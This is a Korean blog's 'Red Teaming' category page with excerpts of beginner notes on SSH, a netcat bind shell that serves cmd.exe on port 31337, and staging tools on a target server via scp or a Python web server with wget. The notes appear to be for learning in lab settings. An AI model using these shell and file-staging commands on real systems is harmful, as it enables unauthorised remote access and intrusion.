목록분야/Red Teaming (7)
모두의 dream
보호되어 있는 글입니다.
SSH (Secure Shell)보호되지 않는 네트워크를 통해 컴퓨터에 연결할 때 안전한 연결이 가능하도록 하는 네트워크 프로토콜. 원격 시스템에 액세스할 때 데이터의 기밀성과 무결성을 유지하는데 필수적임.작동 방식언젠간 공부하지 않을까요~SSH 활성화user@user-None:~$ sudo service ssh startuser@user-None:~$ service ssh status● ssh.service - OpenBSD Secure Shell server Loaded: loaded (/lib/systemd/system/ssh.service; disabled; preset: enabled) Drop-In: /etc/systemd/system/ssh.service.d ..
1. Bind Shell서버(접속 대상)가 포트를 열면 클라이언트(접속자)가 접속하여 쉘을 여는 방법. Bind Shell 을 여는 방법은 다음과 같다.서버 (접속 대상)C:\Users\user\Downloads>nc64.exe -lp 31337 -e cmd.exe 옵션 -l: listen 모드로 포트를 열어줌. -p: 포트 지정. -v: verbosity 증가, 더 많은 정보를 보여줌. -e: 접속 후 실행될 명령어 지정.클라이언트 (접속자)C:\Users\user\Downloads>nc64.exe 127.0.0.1 31337 Microsoft Windows [Version 10.0.19045.4412] (c) Microsoft Corporation. All rights reserved. C:\User..
공격 대상 서버에 파일을 옮기는 방법에 대해 작성해봤다.I. SCP (Secure Copy)원격지에 있는 파일을 전송하거나 가져올때 사용하는 파일 전송 프로토콜.원격지scp @:예시scp ./nmap root@10.10.110.100:/tmp옵션-P : 포트번호를 지정함-p : 원본파일 수정/사용시간 및 권한을 유지함-r : 하위 디렉토리 및 파일 모두 복사함II. 웹 서버 열기파이썬3의 http.server 모듈을 이용해서 서버를 연 후 wget을 이용해서 파일을 다운로드 한다.원격지 명령어 (파일이 있는 디렉토리에서 실행해야 됨)python3 -m http.server 8000옵션-m: 특정 모듈을 스크립트처럼 실행시키도록 해줌.대상 서버 명령어wget http://10.10.14.2:8000/nmap
보호되어 있는 글입니다.
보호되어 있는 글입니다.
보호되어 있는 글입니다.